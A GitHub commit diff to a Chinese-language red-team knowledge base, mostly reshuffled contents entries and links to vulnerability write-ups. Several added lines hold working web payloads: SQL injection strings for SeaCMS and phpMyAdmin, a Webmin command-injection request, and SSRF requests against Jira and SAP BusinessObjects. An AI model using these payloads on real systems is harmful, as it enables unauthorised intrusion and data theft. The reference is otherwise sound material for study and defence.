Skip to content

Commit

Permalink
update 2021年08月25日 10:48:19
Browse files Browse the repository at this point in the history
  • Loading branch information
No-Github committed Aug 25, 2021
1 parent 004fbc7 commit 7a3a155
Show file tree
Hide file tree
Showing 5 changed files with 130 additions and 24 deletions.
3 changes: 0 additions & 3 deletions 1earn/Security/ICS/上位机安全.md
Original file line number Diff line number Diff line change
Expand Up @@ -24,9 +24,6 @@
**官网**
- http://www.kingview.com/index.php

**漏洞利用**
- [CS-Exploits](../RedTeam/软件服务安全/CS-Exploits.md#组态王)

---

## ScadaBR
Expand Down
108 changes: 99 additions & 9 deletions 1earn/Security/RedTeam/Web安全/BS-Exploits.md
Original file line number Diff line number Diff line change
Expand Up @@ -29,6 +29,7 @@
* [October](#october)
* [php7cms](#php7cms)
* [RuoYi](#ruoyi)
* [SeaCMS](#seacms)
* [ShopXO](#shopxO)
* [SiteServer](#siteserver)
* [ThinkAdmin](#thinkadmin)
Expand All @@ -43,6 +44,8 @@
* [Yii](#yii)
* [YxCMS](#yxcms)
* [zcncms](#zcncms)
* [Zend](#zend)
* [五指cms](#五指cms)

* **[框架引擎中间件](#框架引擎中间件)**
* [ActiveMQ](#activemq)
Expand All @@ -58,14 +61,17 @@
* [httpd](#httpd)
* [IIS](#iis)
* [JBOSS](#jboss)
* [Jetty](#jetty)
* [Nacos](#nacos)
* [Resin](#resin)
* [Nginx](#nginx)
* [RabbitMQ](#rabbitmq)
* [RocketMQ](#rocketmq)
* [shiro](#shiro)
* [Solr](#solr)
* [Spring](#spring)
* [Struts2](#struts2)
* [Tapestry](#tapestry)
* [Tomcat](#tomcat)
* [Weblogic](#weblogic)
* [Websphere](#websphere)
Expand Down Expand Up @@ -110,7 +116,9 @@
* [JumpServer](#jumpserver)
* [Jupyter](#jupyter)
* [log4j](#log4j)
* [MinIO](#minio)
* [Nexus](#nexus)
* [NiFi](#niFi)
* [nodejs](#nodejs)
* [noVNC](#novnc)
* [OFBiz](#ofbiz)
Expand All @@ -119,6 +127,7 @@
* [PHP-FPM](#php-fpm)
* [PHPUnit](#phpunit)
* [PHPMailer](#phpmailer)
* [SaltStack](#SaltStack)
* [SkyWalking](#skywalking)
* [Smartbi](#smartbi)
* [Supervisord](#supervisord)
Expand Down Expand Up @@ -150,6 +159,8 @@
* [帆软](#帆软)
* [万户](#万户)
* [红帆](#红帆)
* [金和](#金和)
* [华天](#华天)

* **[Other](#other)**

Expand Down Expand Up @@ -614,6 +625,22 @@ zSyK5Kp6PZAAjlT+eeNMlg==

---

### SeaCMS

> Fofa: app="海洋CMS"

**CVE-2020-21378 后台SQL注入漏洞**
- 描述

攻击者可通过对admin_members_group.php的编辑操作中的id参数利用该漏洞进行SQL注入攻击。

- POC | Payload | exp
```
/admin_members_group.php?action=edit&id=2%20and%20if(mid(user(),1,1)=%27r%27,concat(rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27))%20RLIKE%20%27(a.*)%2b(a.*)%2b(a.*)%2b(a.*)%2b(a.*)%2b(a.*)%2b(a.*)%2bcd%27,1)
```

---

### ShopXO

**CNVD-2021-15822 任意文件读取漏洞**
Expand Down Expand Up @@ -845,6 +872,12 @@ Content-Disposition: form-data; name="couponid"

---

### UCMS

**CVE-2020-25483 后台文件上传漏洞**
- 文章
- [UCMS文件上传漏洞(CVE-2020-25483)复现](https://blog.csdn.net/xuandao_ahfengren/article/details/110233085)

### vBulletin

**vBulletin 5.6.1 SQL 注入**
Expand Down Expand Up @@ -1742,14 +1775,6 @@ ElasticSearch 是一个基于 Lucene 的搜索服务器.它提供了一个分布

---

### Nginx

**CVE-2021-23017**
- 相关文章
- [对 Nginx DNS 解析漏洞的应急响应](https://www.tr0y.wang/2021/05/28/CVE-2021-23017/)

---

### Resin

> 官网 : https://caucho.com/
Expand All @@ -1763,6 +1788,14 @@ ElasticSearch 是一个基于 Lucene 的搜索服务器.它提供了一个分布

---

### Nginx

**CVE-2021-23017**
- 相关文章
- [对 Nginx DNS 解析漏洞的应急响应](https://www.tr0y.wang/2021/05/28/CVE-2021-23017/)

---

### RabbitMQ

> Fofa: app="RabbitMQ"
Expand Down Expand Up @@ -2049,6 +2082,7 @@ Solr 的漏洞参考 https://issues.apache.org/jira/projects/SOLR/issues
- 文章
- [Spring Security OAuth RCE (CVE-2016-4977) 漏洞分析](https://paper.seebug.org/70/)
- [漏洞复现|CVE-2016-4977(SpringSecurityOauth RCE)](https://mp.weixin.qq.com/s/dHnD3z8BlSFvfkDZ1gVo-g)
- POC | Payload | exp
Expand Down Expand Up @@ -2662,6 +2696,12 @@ Tomcat 在安装部署后,在 webapps 默认存在一个 examples 目录,该

Apache Tomcat 中的 WebSocket 存在安全漏洞,该漏洞源于程序没有正确验证 payload 的长度。攻击者可利用该漏洞造成拒绝服务(无限循环)。

- 影响版本
- Apache Tomcat 10.0.0-M1-10.0.0-M6
- Apache Tomcat 9.0.0.M1-9.0.36
- Apache Tomcat 8.5.0-8.5.56
- Apache Tomcat 7.0.27-7.0.104

- 文章
- [CVE-2020-13935复现与浅析](https://www.freebuf.com/vuls/256004.html)

Expand Down Expand Up @@ -3987,6 +4027,7 @@ jira 的漏洞参考 https://jira.atlassian.com/browse/JRASERVER-69858?filter=13
- Atlassian Jira 7.6.0 ~ 8.4.0
- POC | Payload | exp
- `/plugins/servlet/gadgets/makeRequest?url=https://victomhost:[email protected]`
- [jas502n/CVE-2019-8451](https://github.com/jas502n/CVE-2019-8451)
**CVE-2019-11581 Atlassian Jira 模板注入漏洞**
Expand Down Expand Up @@ -4068,6 +4109,14 @@ Jupyter Notebook(此前被称为 IPython notebook)是一个交互式笔记
---
### MinIO
**CVE-2021-21287 MinIO未授权SSRF漏洞**
- 文章
- [容器与云的碰撞——一次对MinIO的测试](https://cloud.tencent.com/developer/article/1785462)
---
### Nexus
> 官网 : https://www.sonatype.com/product-nexus-repository
Expand Down Expand Up @@ -4106,6 +4155,18 @@ admin admin123
---
### NiFi
> Fofa: "nifi" && title=="NiFi"
**NiFi Api 远程代码执行**
- POC | Payload | exp
```
use exploit/multi/http/apache_nifi_processor_rce
```
---
### nodejs
**nodejs debug/inspect RCE**
Expand Down Expand Up @@ -4239,6 +4300,13 @@ admin admin123
- [PHPmyadmin SQL injection in Designer feature 研究(CVE-2019-18622)](https://xz.aliyun.com/t/6960)
- https://github.com/phpmyadmin/phpmyadmin/issues/15651
**CVE-2020-26935 phpmyadmin后台SQL注入**
- POC | Payload | exp
```
/tbl_zoom_select.php?db=pentest&table=a&get_data_row=1&where_clause=updatexml(1,concat(0x7e,user()),1)
```
---
### PHP
Expand Down Expand Up @@ -4754,6 +4822,16 @@ PHP-FPM 是一个 PHPFastCGI 管理器,对于 PHP 5.3.3 之前的 php 来说
- POC | Payload | exp
- [jas502n/CVE-2019-15642](https://github.com/jas502n/CVE-2019-15642)
**CVE-2020-35606**
- POC | Payload | exp
```
/package-updates/update.cgi
application/x-www-form-urlencoded
redir=%2E%2E%2Fsquid%2F&redirdesc=Squid%20Proxy%20Server&mode=new&u=squid34%0A%7C#{payload}%26%26
```
---
### XenMobile
Expand Down Expand Up @@ -4854,6 +4932,18 @@ zabbix 是一款服务器监控软件,其由 server、agent、web 等模块组
- [chipik/SAP_RECON](https://github.com/chipik/SAP_RECON)
- [duc-nt/CVE-2020-6287-exploit](https://github.com/duc-nt/CVE-2020-6287-exploit)
**CVE-2020-6308**
- 描述
SAP BusinessObjects Business Intelligence平台(Web服务)版本-410、420、430允许未经身份验证的攻击者注入任意值作为CMS参数,以在内部网络上执行查找,否则将无法从外部访问该内部网络
- POC | Payload | exp
```
/AdminTools/querybuilder/logon?framework=
aps=xxx.dnslog.cn&usr=admin&pwd=admin&aut=secEnterprise&main_page=ie.jsp&new_pass_page=newpwdform.jsp&exit_page=logonform.jsp
```
---
### 蓝凌
Expand Down Expand Up @@ -6090,7 +6180,7 @@ group-admin/123456
---
### 华天动力OA
### 华天
> Fofa : app="华天动力-OA8000"
Expand Down
11 changes: 11 additions & 0 deletions 1earn/Security/RedTeam/后渗透/实验/Exchange.md
Original file line number Diff line number Diff line change
Expand Up @@ -380,6 +380,16 @@ use exploit/windows/http/exchange_ecp_dlp_policy
**文章**
- [CVE-2020-17083 Microsoft Exchange Server任意代码执行漏洞 POC](https://mp.weixin.qq.com/s/LMUMmuGfT3nmKN88O5hBAA)
**POC | Payload | exp**
- https://srcincite.io/pocs/cve-2020-17083.ps1.txt
---
## CVE-2020-17143 Microsoft Exchange 信息泄露漏洞
**POC | Payload | exp**
- https://srcincite.io/pocs/cve-2020-17143.py.txt
---
## CVE-2020-17144 登录后反序列化漏洞
Expand Down Expand Up @@ -444,6 +454,7 @@ use exploit/windows/http/exchange_ecp_dlp_policy
**文章**
- [Exchange SSRF漏洞从proxylogon到proxyshell(一)](https://mp.weixin.qq.com/s/B_5WWNjG110PCS_gHcpR-A)
- [Exchange proxyshell exp编写(二)](https://mp.weixin.qq.com/s/aEnoBvibp-gkt3qtcOXqAw)
- [Exchange-Proxyshell](https://mp.weixin.qq.com/s/GWFsIRlyR7i8nbg6b7kDnA)
**POC | Payload | exp**
- [GossiTheDog/scanning](https://github.com/GossiTheDog/scanning)
Expand Down
22 changes: 13 additions & 9 deletions 1earn/Security/RedTeam/软件服务安全/CS-Exploits.md
Original file line number Diff line number Diff line change
Expand Up @@ -30,8 +30,10 @@

* **[数据库](#数据库)**
* [CouchDB](#couchdb)
* [InfluxDB](#influxdb)
* [memcached](#memcached)
* [MSSQL](#mssql)
* [MongoDB](#mongodb)
* [Mysql](#mysql)
* [oracle](#oracle)
* [OrientDB](#orientdb)
Expand All @@ -44,7 +46,6 @@
* [由系统漏洞引起](#由系统漏洞引起)
* [由配置不当引起](#由配置不当引起)
* [容器服务缺陷引起](#容器服务缺陷引起)
* [vCenter](#vcenter)

* **[分布式](#分布式)**
* [Hadoop](#hadoop)
Expand Down Expand Up @@ -88,6 +89,8 @@ Apache JMeter 是美国阿帕奇(Apache)软件基金会的一套使用 Java

**Java_RMI**

> Fofa: app="Oracle-JAVA-RMI"
- 简介

Java RMI, 即 远程方法调用(Remote Method Invocation), 一种用于实现远程过程调用(RPC)(Remote procedure call)的 Java API, 能直接传输序列化后的 Java 对象和分布式垃圾收集
Expand Down Expand Up @@ -441,7 +444,8 @@ Samba 是 Samba 团队开发的一套可使 UNIX 系列的操作系统与微软
`Memcached 是一套常用的 key-value 分布式高速缓存系统`
> shodan : "product:Memcached"
> shodan: "product:Memcached"
> fofa: app="MEMCACHED"
**未授权访问漏洞**
- 概述
Expand Down Expand Up @@ -1072,6 +1076,7 @@ select system('id');
- [0671/RedisModules-ExecuteCommand-for-Windows](https://github.com/0671/RedisModules-ExecuteCommand-for-Windows)
- [LoRexxar/redis-rogue-server](https://github.com/LoRexxar/redis-rogue-server)
- [No-Github/redis-rogue-server-win](https://github.com/No-Github/redis-rogue-server-win)
- [r35tart/RedisWriteFile](https://github.com/r35tart/RedisWriteFile) - 通过 Redis 主从写出无损文件
**Lua RCE**
- 文章
Expand Down Expand Up @@ -1125,13 +1130,6 @@ citrix/citrix
---
## Containerd
**CVE-2020-15257**
- [CVE-2020-15257:Containerd虚拟环境逃逸复现](https://mp.weixin.qq.com/s/tyxJhqcZ3QTSjAqTZZSgrA)
---
## Docker
`Docker 是一个开源的引擎可以轻松地为任何应用创建一个轻量级的、可移植的、自给自足的容器。开发者在笔记本上编译测试通过的容器可以批量地在生产环境中部署包括 VMs、bare metal、OpenStack 集群和其他的基础应用平台 Docker。`
Expand Down Expand Up @@ -1412,6 +1410,9 @@ citrix/citrix
- [Docker Patched the Most Severe Copy Vulnerability to Date With CVE-2019-14271](https://unit42.paloaltonetworks.com/docker-patched-the-most-severe-copy-vulnerability-to-date-with-cve-2019-14271/)
- [CVE-2019-14271:Docker cp命令漏洞分析](https://www.anquanke.com/post/id/193218)
**CVE-2020-15257**
- [CVE-2020-15257:Containerd虚拟环境逃逸复现](https://mp.weixin.qq.com/s/tyxJhqcZ3QTSjAqTZZSgrA)
---
# 分布式
Expand Down Expand Up @@ -1477,6 +1478,9 @@ citrix/citrix
- 文章
- [Apache Spark 未授权访问漏洞](https://vulhub.org/#/environments/spark/unacc/)
- POC | Payload | exp
- [aRe00t/rce-over-spark](https://github.com/aRe00t/rce-over-spark)
---
## ZooKeeper
Expand Down
10 changes: 7 additions & 3 deletions README.md
Original file line number Diff line number Diff line change
Expand Up @@ -16,9 +16,9 @@
</p>

* **简介** : 本项目的初衷是分享知识资源,让更多人接触和了解安全、运维领域,但受限于本人能力有限,难免会有错误和借鉴的地方,对于内容中有疑问或建议请提交 issue.
* **定位** : 个人维护的安全知识框架
* **定位** : ffffffff0x 团队维护的安全知识框架
* **更新时间** : 不定期
* **项目地址** : https://github.com/No-Github/1earn
* **项目地址** : https://github.com/ffffffff0x/1earn
* **学习线路图** : 初学者或想快速构建知识结构请访问 [roadmap](roadmap.md)

---
Expand Down Expand Up @@ -240,7 +240,7 @@

## 联系我

- [email protected]
- 如果你有任何其他方面的问题或建议,可以在 issue 提出或发送邮件至 [email protected]

---

Expand All @@ -252,3 +252,7 @@
- <sup>署名 — 您必须给出适当的署名,提供指向本许可协议的链接,同时标明是否(对原始作品)作了修改。您可以用任何合理的方式来署名,但是不得以任何方式暗示许可人为您或您的使用背书。</sup>
- <sup>没有附加限制 — 您不得适用法律术语或者 技术措施 从而限制其他人做许可协议允许的事情。</sup>
- <sup>注: 本项目所有文件仅供学习和研究使用,请勿使用项目中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.</sup>

---

> create by ffffffff0x

0 comments on commit 7a3a155

Please sign in to comment.